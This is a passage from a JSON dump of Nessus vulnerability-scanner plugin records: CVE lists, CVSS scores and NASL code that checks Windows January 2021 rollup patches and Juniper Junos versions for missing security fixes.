script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598279',\n '4598289'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598279, 4598289])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T07:09:21", "description": "According to the self reported version of Junos OS on the remote device it is affected by a Denial of Service (DoS)\nvulnerability. By continuously executing the same CLI commands 'show ospf interface extensive' or 'show ospf interface\ndetail' CLI commands, a local attacker can repeatedly crash the RPD process causing a sustained Denial of Service.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 3, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2020-07-17T00:00:00", "title": "Juniper Junos Denial of Service (DoS) JSA11030", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1643"], "modified": "2020-07-17T00:00:00", "cpe": ["cpe:/o:juniper:junos"], "id": "JUNIPER_JSA11030.NASL", "href": "https://www.tenable.com/plugins/nessus/138605", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138605);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/13\");\n\n script_cve_id(\"CVE-2020-1643\");\n script_xref(name:\"JSA\", value:\"JSA11030\");\n script_xref(name:\"IAVA\", value:\"2020-A-0320\");\n\n script_name(english:\"Juniper Junos Denial of Service (DoS) JSA11030\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the self reported version of Junos OS on the remote device it is affected by a Denial of Service (DoS)\nvulnerability. By continuously executing the same CLI commands 'show ospf interface extensive' or 'show ospf interface\ndetail' CLI commands, a local attacker can repeatedly crash the RPD process causing a sustained Denial of Service.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/JSA11030\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant Junos software release referenced in Juniper advisory JSA11030\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1643\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/JUNOS/Version\", \"Host/Juniper/model\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('junos.inc');\ninclude(\"hostlevel_funcs.inc\");\n\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\nmodel = get_kb_item_or_exit('Host/Juniper/model');\nfixes = make_array();\n\n# Only systems utilizing ARM processors, found on the EX2300 and EX3400, are vulnerable to this issue.\nuname = get_kb_item_or_exit(\"Host/uname\");\nif(\"arm\" >!< tolower(uname) || (model !~ '^EX(23|34)00'))\n audit(AUDIT_HOST_NOT, \"affected\");\n\nfixes['12.3X48'] = '12.3X48-D100';\nfixes['14.1X53'] = '14.1X53-D54';\nfixes['15.1'] = '15.1R7-S7';\nfixes['15.1X49'] = '15.1X49-D210';\nfixes['15.1X53'] = '15.1X53-D593';\nfixes['16.1'] = '16.1R7-S8';\nfixes['17.1'] = '17.1R2-S12';\nfixes['17.2'] = '17.2R3-S4';\nfixes['17.3'] = '17.3R3-S8';\nfixes['17.4'] = '17.4R2-S2';\nfixes['18.1'] = '18.1R3-S2';\nfixes['18.2'] = '18.2R2';\nfixes['18.2X75'] = '18.2X75-D40';\nfixes['18.3'] = '18.3R1-S2';\n\nfix = check_junos(ver:ver, fixes:fixes, exit_on_fail:TRUE);\nreport = get_report(ver:ver, fix:fix);\nsecurity_report_v4(severity:SECURITY_NOTE, port:0, extra:report);", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-13T14:19:49", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 7, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598231: Windows 10 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1681", "CVE-2021-1691", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1685", "CVE-2021-1638", "CVE-2021-1687", "CVE-2021-1664", "CVE-2021-1697", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1669", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1642", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1689", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1680", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1651", "CVE-2021-1708", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1692", "CVE-2021-1637", "CVE-2021-1686", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1690", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657", "CVE-2021-1705"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598231.NASL", "href": "https://www.tenable.com/plugins/nessus/144873", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144873);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/12\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015\");\n script_xref(name:\"MSKB\", value:\"4598231\");\n script_xref(name:\"MSFT\", value:\"MS21-4598231\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598231: Windows 10 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598231/windows-10-update-kb4598231\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2a8452c3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598231.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598231'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598231])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T14:19:49", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, 